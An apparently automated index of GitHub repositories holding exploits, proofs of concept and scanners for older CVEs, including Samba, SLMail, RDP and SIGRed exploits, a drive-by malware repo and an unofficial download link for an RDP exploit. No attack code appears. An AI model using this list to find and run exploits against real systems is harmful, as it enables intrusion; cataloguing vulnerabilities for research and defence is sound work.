**Easy RM to MP3 Converter es un software que sufre de una vulnerabiliad de desbordamiento de buffer basada en la pila o StackBufferOverflow lo cual puede permite a los atacantes remotos ejecutar código arbitrario a través de un nombre de archivo largo en un archivo de lista de reproducción (.pls)** : [exploitwritter/CVE-2009-1330_EasyRMToMp3Converter](https://api.github.com/repos/exploitwritter/CVE-2009-1330_EasyRMToMp3Converter) create time: 2019-02-18T19:07:02Z

**None** : [zhangyongbo100/-Ruby-dl-handle.c-CVE-2009-5147-](https://api.github.com/repos/zhangyongbo100/-Ruby-dl-handle.c-CVE-2009-5147-) create time: 2019-04-25T06:46:50Z

**vmware cloudburst exploit CVE-2009-1244** : [piotrbania/vmware_exploit_pack_CVE-2009-1244](https://api.github.com/repos/piotrbania/vmware_exploit_pack_CVE-2009-1244) create time: 2019-06-11T09:08:52Z

**phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC (CVE-2009-1151)** : [minervais/pocs](https://api.github.com/repos/minervais/pocs) create time: 2018-02-03T22:26:09Z

**An implementation of CVE-2009-0689 for the Nintendo Wii.** : [Fullmetal5/str2hax](https://api.github.com/repos/Fullmetal5/str2hax) create time: 2018-12-18T04:24:43Z

**PoC for CVE-2009-0229 "Print Spooler Read File Vulnerability" LPE AFR (related to CVE-2020-1048)** : [zveriu/CVE-2009-0229-PoC](https://api.github.com/repos/zveriu/CVE-2009-0229-PoC) create time: 2020-05-14T19:40:50Z

**coldfusion exploit based on https://cvedetails.com/cve/CVE-2009-2265/** : [zaphoxx/zaphoxx-coldfusion](https://api.github.com/repos/zaphoxx/zaphoxx-coldfusion) create time: 2020-10-02T15:17:21Z

**Workaround for the vulnerability identified by TWSL2011-007 or CVE-2008-0228 - iOS x509 Certificate Chain Validation Vulnerability** : [SpiderLabs/TWSL2011-007_iOS_code_workaround](https://api.github.com/repos/SpiderLabs/TWSL2011-007_iOS_code_workaround) create time: 2011-07-28T22:20:41Z

**This is a functional proof of concept program to aid in exploiting systems vulnerable to CVE 2008-0244. This vulnerability specifically relates to issues in how the SAP MaxDB protocol handles specially crafted packets. It is possible to execute system level commands remotely.** : [gregkcarson/sapmdbret](https://api.github.com/repos/gregkcarson/sapmdbret) create time: 2015-05-11T16:55:19Z

**Sockstress (CVE-2008-4609) DDoS implementation written in Go** : [marcelki/sockstress](https://api.github.com/repos/marcelki/sockstress) create time: 2016-05-06T17:21:32Z

**None** : [followboy1999/CVE-2008-7220](https://api.github.com/repos/followboy1999/CVE-2008-7220) create time: 2016-10-28T08:30:36Z

**Reproducible exploits for: CVE-2016-1240 CVE-2008-2938 CVE-2014-2064 CVE-2014-1904** : [Naramsim/Offensive](https://api.github.com/repos/Naramsim/Offensive) create time: 2016-10-13T13:46:46Z

**Debian OpenSSL Predictable PRNG (CVE-2008-0166)** : [g0tmi1k/debian-ssh](https://api.github.com/repos/g0tmi1k/debian-ssh) create time: 2013-09-22T21:20:31Z

**Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection** : [SECFORCE/CVE-2008-5416](https://api.github.com/repos/SECFORCE/CVE-2008-5416) create time: 2017-05-03T19:31:34Z

**RedDot CMS versions 7.5 Build 7.5.0.48 and below full database enumeration exploit that takes advantage of a remote SQL injection vulnerability in ioRD.asp.** : [SECFORCE/CVE-2008-1613](https://api.github.com/repos/SECFORCE/CVE-2008-1613) create time: 2017-05-03T19:39:27Z

**VideoLAN VLC media player 0.9.4 Media Player ty.c buffer overflow** : [bongbongco/CVE-2008-4654](https://api.github.com/repos/bongbongco/CVE-2008-4654) create time: 2017-07-02T23:33:30Z

**An EXP could run on Windows x64 against CVE-2008-4654.** : [KernelErr/VLC-CVE-2008-4654-Exploit](https://api.github.com/repos/KernelErr/VLC-CVE-2008-4654-Exploit) create time: 2017-08-18T05:22:29Z

**Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation** : [alt3kx/CVE-2008-6827](https://api.github.com/repos/alt3kx/CVE-2008-6827) create time: 2018-04-03T00:08:23Z

**Blind SQL injection brute force.** : [KyomaHooin/CVE-2008-6970](https://api.github.com/repos/KyomaHooin/CVE-2008-6970) create time: 2016-05-05T14:13:33Z

**Scripts to analyze conflicker worm which exploits famous netapi vulnerability (CVE-2008-4250) i.e MS08-067** : [thunderstrike9090/Conflicker_analysis_scripts](https://api.github.com/repos/thunderstrike9090/Conflicker_analysis_scripts) create time: 2018-10-18T09:38:46Z

**None** : [ab1gale/phpcms-2008-CVE-2018-19127](https://api.github.com/repos/ab1gale/phpcms-2008-CVE-2018-19127) create time: 2018-11-09T09:51:26Z

**CVE-2008-0128** : [ngyanch/4062-1](https://api.github.com/repos/ngyanch/4062-1) create time: 2018-11-20T16:26:21Z

**Debian OpenSSL Predictable PRNG (CVE-2008-0166)** : [avarx/vulnkeys](https://api.github.com/repos/avarx/vulnkeys) create time: 2018-12-31T16:09:49Z

**Debian OpenSSL Predictable PRNG (CVE-2008-0166) http://web.archive.org/web/20110723091928/http://digitaloffense.net/tools/debian-openssl/** : [nu11secur1ty/debian-ssh](https://api.github.com/repos/nu11secur1ty/debian-ssh) create time: 2019-02-28T18:22:06Z

**CVE-2019-0708 EXPloit-poc 漏洞描述 微软官方紧急发布安全补丁,修复了一个Windows远程桌面服务的远程代码执行漏洞CVE-2019-0708,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证,无需用户交互。当未经身份验证的攻击者使用RDP(常见端口3389)连接到目标系统并发送特制请求时,可以在目标系统上执行任意命令。甚至传播恶意蠕虫,感染内网其他机器。类似于2017年爆发的WannaCry等恶意勒索软件病毒。 漏洞评级 CVE-2019-0708 严重 安全建议 1、针对Windows 7及Windows Server 2008的用户,及时安装官方安全补丁:https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499175 2、针对Windows 2003及Windows XP的用户,及时更新系统版本或安装官方补丁:https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708 CVE-2019-0708 EXPloit-poc 影响版本 Windows7 XP Windows 2003 Windows Server 2008 Windows Server 2008 R2 EXPloit-poc: https://pan.baidu.com/s/184gN1tJVIOYqOjaezM_VsA 提取码:e2k8** : [sbkcbig/CVE-2019-0708-Poc-exploit](https://api.github.com/repos/sbkcbig/CVE-2019-0708-Poc-exploit) create time: 2019-05-15T20:26:34Z

**PoC about CVE-2019-0708 (RDP; Windows 7, Windows Server 2003, Windows Server 2008) ** : [syriusbughunt/CVE-2019-0708](https://api.github.com/repos/syriusbughunt/CVE-2019-0708) create time: 2019-05-16T00:34:23Z

**CVE-2008-1611 TFTP 1.41 buffer overflow exploit in the filepath** : [Axua/CVE-2008-1611](https://api.github.com/repos/Axua/CVE-2008-1611) create time: 2019-12-08T17:18:31Z

**None** : [nmurilo/CVE-2008-4687-exploit](https://api.github.com/repos/nmurilo/CVE-2008-4687-exploit) create time: 2020-05-30T04:53:07Z

**CVE-2020-1066-EXP支持Windows 7和Windows Server 2008 R2操作系统** : [cbwang505/CVE-2020-1066-EXP](https://api.github.com/repos/cbwang505/CVE-2020-1066-EXP) create time: 2020-06-01T04:44:05Z

**None** : [TheRook/AudioCaptchaBypass-CVE-2008-2019](https://api.github.com/repos/TheRook/AudioCaptchaBypass-CVE-2008-2019) create time: 2020-07-02T20:04:05Z

**Spydir is a small utility to monitor file changes in Windows directory regardless of subdirectory and files permissions (exploits CVE-2007-0843)** : [z3APA3A/spydir](https://api.github.com/repos/z3APA3A/spydir) create time: 2014-11-27T14:36:05Z

**March Networks DVR 3204 - Logfile Information Disclosure** : [alt3kx/CVE-2007-6638](https://api.github.com/repos/alt3kx/CVE-2007-6638) create time: 2018-04-03T00:36:34Z

**Airsensor M520 - HTTPd Unauthenticated Remote Denial of Service / Buffer Overflow (PoC)** : [alt3kx/CVE-2007-5036](https://api.github.com/repos/alt3kx/CVE-2007-5036) create time: 2018-04-03T01:09:40Z

**IBM Proventia Sensor Appliance - Multiple Input Validation Vulnerabilities** : [alt3kx/CVE-2007-3830](https://api.github.com/repos/alt3kx/CVE-2007-3830) create time: 2018-04-03T01:18:41Z

**PHP remote file inclusion in main.php in ISS Proventia Network IPS GX5108 1.3 and GX5008 1.5 ** : [alt3kx/CVE-2007-3831](https://api.github.com/repos/alt3kx/CVE-2007-3831) create time: 2018-05-11T02:02:21Z

**PHP-CGI-REMOTE_CVE-2012-1823, UnrealIRCd, MySQL, PostgreSQL and SSH bruteforce, VSFTPD2.3.4, samba CVE-2007-2447, JAVA RMI Server, distcc daemon, misconfigured NFS files, etc.** : [Unix13/metasploitable2](https://api.github.com/repos/Unix13/metasploitable2) create time: 2019-07-05T11:55:41Z

**Make CVE-2007-4607 exploitable again!** : [joeyrideout/CVE-2007-4607](https://api.github.com/repos/joeyrideout/CVE-2007-4607) create time: 2018-09-27T02:22:45Z

**CVE-2007-1567 - WarFTP 1.65 'USER' Remote Buffer Overflow Vulnerability. Tested on Windows XP Professional SP3.** : [war4uthor/CVE-2007-1567](https://api.github.com/repos/war4uthor/CVE-2007-1567) create time: 2018-12-19T22:02:54Z

**A simple exploit for CVE-2007-2447** : [b1fair/smb_usermap](https://api.github.com/repos/b1fair/smb_usermap) create time: 2019-09-30T21:06:09Z

**IE7 buffer overflow through an ANI file** : [Axua/CVE-2007-0038](https://api.github.com/repos/Axua/CVE-2007-0038) create time: 2019-11-29T11:15:39Z

**Python Script Exploit SMB Usermap Script CVE-2007-2447** : [Unam3dd/exploit_smb_usermap_script](https://api.github.com/repos/Unam3dd/exploit_smb_usermap_script) create time: 2019-12-03T18:25:41Z

**Remote Command Injection Vulnerability (CVE-2007-2447), allows remote attackers to execute arbitrary commands by specifying a Samba username containing shell meta characters.** : [JoseBarrios/CVE-2007-2447](https://api.github.com/repos/JoseBarrios/CVE-2007-2447) create time: 2020-01-20T02:30:35Z

**An attack exploiting CVE 2007-0038 on Windows XP Pro x64 Edition SP1** : [Cheesse/cve2007-0038x64](https://api.github.com/repos/Cheesse/cve2007-0038x64) create time: 2020-03-26T03:04:58Z

**Smb Usermap Destoyer is a python2 exploit for CVE-2007-2447 ( 'Username' map script' Command Execution ).** : [nickvourd/smb-usermap-destroyer](https://api.github.com/repos/nickvourd/smb-usermap-destroyer) create time: 2020-05-16T01:36:28Z

**None** : [3x1t1um/CVE-2007-2447](https://api.github.com/repos/3x1t1um/CVE-2007-2447) create time: 2020-04-22T11:47:16Z

**CVE-2007-2447 - Samba usermap script** : [amriunix/CVE-2007-2447](https://api.github.com/repos/amriunix/CVE-2007-2447) create time: 2018-08-03T18:39:56Z

**Exploit for the vulnerability CVE-2007-2447** : [xlcc4096/exploit-CVE-2007-2447](https://api.github.com/repos/xlcc4096/exploit-CVE-2007-2447) create time: 2020-12-06T18:04:44Z

**None** : [WildfootW/CVE-2007-2447_Samba_3.0.25rc3](https://api.github.com/repos/WildfootW/CVE-2007-2447_Samba_3.0.25rc3) create time: 2020-12-09T15:04:44Z

**A2SV = Auto Scanning to SSL Vulnerability HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc Support Vulnerability [CVE-2007-1858] Anonymous Cipher [CVE-2012-4929] CRIME(SPDY) [CVE-2014-0160] CCS Injection [CVE-2014-0224] HeartBleed [CVE-2014-3566] SSLv3 POODLE [CVE-2015-0204] FREAK Attack [CVE-2015-4000] LOGJAM Attack [CVE-2016-0800] SSLv2 DROWN Installation : $ apt update && apt upgrade $ apt install git $ apt install python2 $ apt install python $ git clone https://github.com/hahwul/ a2sv $ cd a2sv $ chmod +x * $ pip2 install -r requirements.txt usage : $ python2 a2sv.py -h It shows all commands how we can use this tool $ python a2sv.py -t 127.0.0.1 127.0.0.1 = target means here own device** : [nyc-tophile/A2SV--SSL-VUL-Scan](https://api.github.com/repos/nyc-tophile/A2SV--SSL-VUL-Scan) create time: 2021-01-01T12:26:08Z

**None** : [Nicoslo/Windows-exploitation-BadBlue-2.7-CVE-2007-6377](https://api.github.com/repos/Nicoslo/Windows-exploitation-BadBlue-2.7-CVE-2007-6377) create time: 2021-02-18T10:33:44Z

**Python implementation of 'Username' map script' RCE Exploit for Samba 3.0.20 < 3.0.25rc3 (CVE-2007-2447).** : [Ziemni/CVE-2007-2447-in-Python](https://api.github.com/repos/Ziemni/CVE-2007-2447-in-Python) create time: 2021-02-22T13:43:48Z

**None** : [0xKn/CVE-2007-2447](https://api.github.com/repos/0xKn/CVE-2007-2447) create time: 2021-03-06T20:39:21Z

**Exploit Samba** : [ozuma/CVE-2007-2447](https://api.github.com/repos/ozuma/CVE-2007-2447) create time: 2021-03-14T17:48:23Z

**A deadlock on the mmap semaphore ‘mmap sem’ in the CentOS 3.9 kernel, that is triggered by a specific interleaving of concurrent threads, one calling the mmap system call and the other calling the mincore system call.** : [tagatac/linux-CVE-2006-4814](https://api.github.com/repos/tagatac/linux-CVE-2006-4814) create time: 2014-09-18T16:38:24Z

**malware del lado del cliente de explotacion de vulnerabilidad de internet explorer 6.0 SP1 en windows xp SP2. No requiere de consentimiento por parte del usuario y no descarga ningun archivo** : [Mario1234/js-driveby-download-CVE-2006-4777](https://api.github.com/repos/Mario1234/js-driveby-download-CVE-2006-4777) create time: 2018-02-06T15:55:05Z

**Exploit script for Crossfire 1.9.0** : [Axua/CVE-2006-1236](https://api.github.com/repos/Axua/CVE-2006-1236) create time: 2019-01-29T23:46:59Z

**Exploit for Easy File Sharing FTP Server 3.5 on Win7 32** : [adenkiewicz/CVE-2006-3592](https://api.github.com/repos/adenkiewicz/CVE-2006-3592) create time: 2019-05-11T18:11:34Z

**simplified version of https://github.com/shauntdergrigorian/cve-2006-6184** : [b03902043/CVE-2006-6184](https://api.github.com/repos/b03902043/CVE-2006-6184) create time: 2019-09-01T04:18:53Z

**Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Python3)** : [0xtz/CVE-2006-3392](https://api.github.com/repos/0xtz/CVE-2006-3392) create time: 2020-06-30T13:07:31Z

**CVE-2006-0450. phpBB 2.0.19 and earlier allows remote attackers to cause a denial of service (application crash) by (1) registering many users through profile.php or (2) using search.php to search in a certain way that confuses the database.** : [Parcer0/CVE-2006-0450-phpBB-2.0.15-Multiple-DoS-Vulnerabilities](https://api.github.com/repos/Parcer0/CVE-2006-0450-phpBB-2.0.15-Multiple-DoS-Vulnerabilities) create time: 2020-08-21T09:50:57Z

**Read arbitrary files for servers running Webmin before 1.290 and Usermin before 1.220.** : [notclement/cve-2006-3392](https://api.github.com/repos/notclement/cve-2006-3392) create time: 2020-09-05T13:17:44Z

**This is a python-based standalone exploit for CVE-2006-6184. This exploit triggers a stack-based buffer overflows in Allied Telesyn TFTP Server (AT-TFTP) 1.9, and possibly earlier, allow remote attackers to cause a denial of service or execute arbitrary code.** : [shauntdergrigorian/cve-2006-6184](https://api.github.com/repos/shauntdergrigorian/cve-2006-6184) create time: 2016-07-21T22:43:43Z

**This small script helps to avoid using MetaSploit (msfconsole) during the Enterprise pentests and OSCP-like exams. Grep included function will help you to get only the important information.** : [IvanGlinkin/CVE-2006-3392](https://api.github.com/repos/IvanGlinkin/CVE-2006-3392) create time: 2020-12-04T11:44:22Z

**Information about my advisory on CVE-2006-3747 (Apache mod_rewrite LDAP off-by-one buffer overflow).. At the time, it was the first public working exploit :)** : [defensahacker/CVE-2006-3747](https://api.github.com/repos/defensahacker/CVE-2006-3747) create time: 2016-11-26T00:20:33Z

**Libsafe - Safety Check Bypass Vulnerability (Proof of Concept Exploit & Time Randomization to Thwart It)** : [tagatac/libsafe-CVE-2005-1125](https://api.github.com/repos/tagatac/libsafe-CVE-2005-1125) create time: 2014-10-04T21:27:57Z

**IBM Lotus Domino <= R8 Password Hash Extraction Exploit** : [schwankner/CVE-2005-2428-IBM-Lotus-Domino-R8-Password-Hash-Extraction-Exploit](https://api.github.com/repos/schwankner/CVE-2005-2428-IBM-Lotus-Domino-R8-Password-Hash-Extraction-Exploit) create time: 2019-03-29T17:31:14Z

**None** : [aforakjackson/cve2005-3299](https://api.github.com/repos/aforakjackson/cve2005-3299) create time: 2019-08-05T01:58:45Z

**None** : [aforakjackson/cve20053299](https://api.github.com/repos/aforakjackson/cve20053299) create time: 2019-08-05T01:59:54Z

**Yetishare SQL Injection in sSortDir_0 parameter - v3.5.2 - v4.5.4. Apart from an admin being able to exploit this, it could also be used in a CSRF attack to trick an admin user into running malicious queries.** : [jra89/CVE-2019-20059](https://api.github.com/repos/jra89/CVE-2019-20059) create time: 2020-02-07T17:47:03Z

**None** : [Parcer0/CVE-2005-0603-phpBB-2.0.12-Full-path-disclosure](https://api.github.com/repos/Parcer0/CVE-2005-0603-phpBB-2.0.12-Full-path-disclosure) create time: 2020-08-28T15:01:49Z

**Minishare 1.4.1 Remote Buffer Overflow** : [kkirsche/CVE-2004-2271](https://api.github.com/repos/kkirsche/CVE-2004-2271) create time: 2018-01-17T03:18:32Z

**None** : [fibonascii/CVE-2004-0558](https://api.github.com/repos/fibonascii/CVE-2004-0558) create time: 2018-03-10T21:04:17Z

**Nortel Wireless LAN Access Point 2200 Series - Denial of Service** : [alt3kx/CVE-2004-2549](https://api.github.com/repos/alt3kx/CVE-2004-2549) create time: 2018-04-03T01:30:30Z

**None** : [PercussiveElbow/CVE-2004-2271-MiniShare-1.4.1-Buffer-Overflow](https://api.github.com/repos/PercussiveElbow/CVE-2004-2271-MiniShare-1.4.1-Buffer-Overflow) create time: 2018-07-25T23:31:21Z

**None** : [uzzzval/cve-2004-2167](https://api.github.com/repos/uzzzval/cve-2004-2167) create time: 2018-12-05T00:43:17Z

**CVE-2004-2271 - Minishare 1.4.1 HTTP Server Remote Buffer Overflow Vulnerability. Tested on Windows XP Professional SP3.** : [war4uthor/CVE-2004-2271](https://api.github.com/repos/war4uthor/CVE-2004-2271) create time: 2018-12-19T00:27:20Z

**A python implementation of CVE-2004-2271 targeting MiniShare 1.4.1.** : [pwncone/CVE-2004-2271-MiniShare-1.4.1-BOF](https://api.github.com/repos/pwncone/CVE-2004-2271-MiniShare-1.4.1-BOF) create time: 2020-02-02T11:56:01Z

**Icecast Header Overwrite buffer overflow RCE < 2.0.1 (Win32)** : [ivanitlearning/CVE-2004-1561](https://api.github.com/repos/ivanitlearning/CVE-2004-1561) create time: 2020-03-27T16:30:22Z

**CVE-2004-1769 // Mass cPanel Reset password** : [Redsplit/shiguresh](https://api.github.com/repos/Redsplit/shiguresh) create time: 2020-05-13T03:18:46Z

**CVE-2004-1769 // Mass cPanel Reset password** : [sinkaroid/shiguresh](https://api.github.com/repos/sinkaroid/shiguresh) create time: 2020-04-21T22:03:18Z

**Python version of Metasploit exploit for CVE-2004-1561** : [darrynb89/CVE-2004-1561](https://api.github.com/repos/darrynb89/CVE-2004-1561) create time: 2020-06-22T12:33:49Z

**Exploit for CVE-2003-0264 based on pwntools and metasploit's windows/reverse_tcp** : [adenkiewicz/CVE-2003-0264](https://api.github.com/repos/adenkiewicz/CVE-2003-0264) create time: 2018-01-01T22:49:13Z

**Exploit SLmail Buffer Overflow CVE-2003-0264** : [fyoderxx/slmail-exploit](https://api.github.com/repos/fyoderxx/slmail-exploit) create time: 2018-09-16T18:27:16Z

**CVE-2003-0264 - SLMail 5.5 POP3 'PASS' Remote Buffer Overflow Vulnerability. Tested on Windows XP Professional SP3.** : [war4uthor/CVE-2003-0264](https://api.github.com/repos/war4uthor/CVE-2003-0264) create time: 2018-12-19T22:49:13Z

**CVE-2003-0222** : [phamthanhsang280477/CVE-2003-0222](https://api.github.com/repos/phamthanhsang280477/CVE-2003-0222) create time: 2019-01-07T10:09:07Z

**CVE-2019-0708 EXPloit-poc 漏洞描述 微软官方紧急发布安全补丁,修复了一个Windows远程桌面服务的远程代码执行漏洞CVE-2019-0708,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证,无需用户交互。当未经身份验证的攻击者使用RDP(常见端口3389)连接到目标系统并发送特制请求时,可以在目标系统上执行任意命令。甚至传播恶意蠕虫,感染内网其他机器。类似于2017年爆发的WannaCry等恶意勒索软件病毒。 漏洞评级 CVE-2019-0708 严重 安全建议 1、针对Windows 7及Windows Server 2008的用户,及时安装官方安全补丁:https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499175 2、针对Windows 2003及Windows XP的用户,及时更新系统版本或安装官方补丁:https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708 CVE-2019-0708 EXPloit-poc 影响版本 Windows7 XP Windows 2003 Windows Server 2008 Windows Server 2008 R2 EXPloit-poc: https://pan.baidu.com/s/184gN1tJVIOYqOjaezM_VsA 提取码:e2k8** : [sbkcbig/CVE-2019-0708-Poc-exploit](https://api.github.com/repos/sbkcbig/CVE-2019-0708-Poc-exploit) create time: 2019-05-15T20:26:34Z

**PoC about CVE-2019-0708 (RDP; Windows 7, Windows Server 2003, Windows Server 2008) ** : [syriusbughunt/CVE-2019-0708](https://api.github.com/repos/syriusbughunt/CVE-2019-0708) create time: 2019-05-16T00:34:23Z

**A POC remote buffer overflow for CVE-2003-0264 - SLMail 5.5** : [pwncone/CVE-2003-0264-SLmail-5.5](https://api.github.com/repos/pwncone/CVE-2003-0264-SLmail-5.5) create time: 2020-03-13T13:27:56Z

**None** : [lushann/cve-2003-0282](https://api.github.com/repos/lushann/cve-2003-0282) create time: 2020-06-14T12:54:58Z

**Bash Proof-of-Concept (PoC) script to exploit SIGRed (CVE-2020-1350). Achieves Domain Admin on Domain Controllers running Windows Server 2003 up to Windows Server 2019.** : [tinkersec/cve-2020-1350](https://api.github.com/repos/tinkersec/cve-2020-1350) create time: 2020-07-14T22:45:48Z

**CVE-2017-11882(通杀Office 2003到2016)** : [littlebin404/CVE-2017-11882](https://api.github.com/repos/littlebin404/CVE-2017-11882) create time: 2019-08-14T11:55:00Z

**Xerver 2.10 - Multiple Request Denial of Service Vulnerabilities** : [alt3kx/CVE-2002-0448](https://api.github.com/repos/alt3kx/CVE-2002-0448) create time: 2018-04-03T01:38:08Z

**Phusion WebServer 1.0 - 'URL' Remote Buffer Overflow** : [alt3kx/CVE-2002-0289](https://api.github.com/repos/alt3kx/CVE-2002-0289) create time: 2018-04-03T01:52:34Z

**Phusion WebServer 1.0 - Directory Traversal** : [alt3kx/CVE-2002-0288](https://api.github.com/repos/alt3kx/CVE-2002-0288) create time: 2018-04-03T02:06:11Z

**SLRNPull Spool Directory Command Line Parameter Buffer Overflow Vulnerability** : [alt3kx/CVE-2002-0740](https://api.github.com/repos/alt3kx/CVE-2002-0740) create time: 2018-05-11T09:38:29Z

**Buffer overflows in the cifslogin command for HP CIFS/9000 Client A.01.06 and earlier** : [alt3kx/CVE-2002-0991](https://api.github.com/repos/alt3kx/CVE-2002-0991) create time: 2018-05-11T12:35:57Z

**Cross-site scripting vulnerability in Cobalt RAQ 4 allows remote attackers to execute arbitrary script as other Cobalt users via Javascript in a URL to (1) service.cgi or (2) alert.cgi.** : [alt3kx/CVE-2002-0346](https://api.github.com/repos/alt3kx/CVE-2002-0346) create time: 2018-05-11T13:25:41Z

**Directory traversal vulnerability in Cobalt RAQ 4 allows remote attackers to read password-protected files, and possibly files outside the web root, via a .. (dot dot) in an HTTP request.** : [alt3kx/CVE-2002-0347](https://api.github.com/repos/alt3kx/CVE-2002-0347) create time: 2018-05-11T13:52:16Z

**service.cgi in Cobalt RAQ 4 allows remote attackers to cause a denial of service** : [alt3kx/CVE-2002-0348](https://api.github.com/repos/alt3kx/CVE-2002-0348) create time: 2018-05-11T13:59:36Z

**Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service via an HTTP request for an MS-DOS device name.** : [alt3kx/CVE-2002-0200](https://api.github.com/repos/alt3kx/CVE-2002-0200) create time: 2018-05-14T21:09:20Z

**Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request, possibly triggering a buffer overflow.** : [alt3kx/CVE-2002-0201](https://api.github.com/repos/alt3kx/CVE-2002-0201) create time: 2018-04-03T02:15:51Z

**Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service Vulnerabilities** : [alt3kx/CVE-2001-0932](https://api.github.com/repos/alt3kx/CVE-2001-0932) create time: 2018-04-03T02:21:39Z

**Directory traversal vulnerability in Shambala 4.5 ** : [alt3kx/CVE-2001-0758](https://api.github.com/repos/alt3kx/CVE-2001-0758) create time: 2018-05-11T02:47:18Z

**Directory traversal vulnerability in ftpd in QPC QVT/Net 4.0 and AVT/Term 5.0** : [alt3kx/CVE-2001-0680](https://api.github.com/repos/alt3kx/CVE-2001-0680) create time: 2018-05-11T00:29:56Z

**Directory traversal vulnerability in Cooolsoft PowerFTP Server 2.03 allows attackers to list or read arbitrary files and directories via a .. (dot dot) in (1) LS or (2) GET.** : [alt3kx/CVE-2001-0931](https://api.github.com/repos/alt3kx/CVE-2001-0931) create time: 2018-05-14T19:08:03Z

**Cooolsoft PowerFTP Server 2.03 allows remote attackers to list the contents of arbitrary drives via a ls (LIST) command that includes the drive letter as an argument, e.g. "ls C:".** : [alt3kx/CVE-2001-0933](https://api.github.com/repos/alt3kx/CVE-2001-0933) create time: 2018-05-14T19:23:46Z

**Cooolsoft PowerFTP Server 2.03 allows remote attackers to obtain the physical path of the server root via the pwd command, which lists the full pathname.** : [alt3kx/CVE-2001-0934](https://api.github.com/repos/alt3kx/CVE-2001-0934) create time: 2018-05-14T19:53:05Z

**ISC INN 2.x - Command-Line Buffer Overflow** : [alt3kx/CVE-2001-1442](https://api.github.com/repos/alt3kx/CVE-2001-1442) create time: 2018-05-14T20:36:10Z

**BEAST (CVE-2001-3389) Checker** : [becrevex/Gaston](https://api.github.com/repos/becrevex/Gaston) create time: 2021-03-03T02:10:01Z

**CVE-2000-0170** : [mike182/exploit](https://api.github.com/repos/mike182/exploit) create time: 2014-11-08T15:21:30Z

**CVE-2000-0979** : [Z6543/CVE-2000-0979](https://api.github.com/repos/Z6543/CVE-2000-0979) create time: 2019-10-26T14:40:17Z

**HoneyPoC: Proof-of-Concept (PoC) script to exploit SIGRed (CVE-2020-1350). Achieves Domain Admin on Domain Controllers running Windows Server 2000 up to Windows Server 2019.** : [ZephrFish/CVE-2020-1350](https://api.github.com/repos/ZephrFish/CVE-2020-1350) create time: 2020-07-14T19:02:25Z

**Test for CVE-2000-0649, and return an IP address if vulnerable** : [rafaelh/CVE-2000-0649](https://api.github.com/repos/rafaelh/CVE-2000-0649) create time: 2021-02-11T04:29:50Z

**A tool i made for use in combination with hackerone.com for Bounty Hacking purposes.** : [websecnl/Bulk_CVE-1999-0532_Scanner](https://api.github.com/repos/websecnl/Bulk_CVE-1999-0532_Scanner) create time: 2018-02-06T19:16:43Z

**Python CVE-2019-1003000 and CVE-2018-1999002 Pre-Auth RCE Jenkins ** : [0xtavian/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins](https://api.github.com/repos/0xtavian/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins) create time: 2019-02-23T10:00:03Z

**None** : [0x6b7966/CVE-2018-1999002](https://api.github.com/repos/0x6b7966/CVE-2018-1999002) create time: 2019-09-10T05:23:48Z

**CVE Data Analysis, CVE Monitor, CVE EXP Prediction Based on Deep Learning. 1999-2020年存量CVE数据分析、监控CVE增量更新、基于深度学习的CVE EXP预测和自动化推送** : [404notf0und/CVE-Flow](https://api.github.com/repos/404notf0und/CVE-Flow) create time: 2020-06-15T14:56:18Z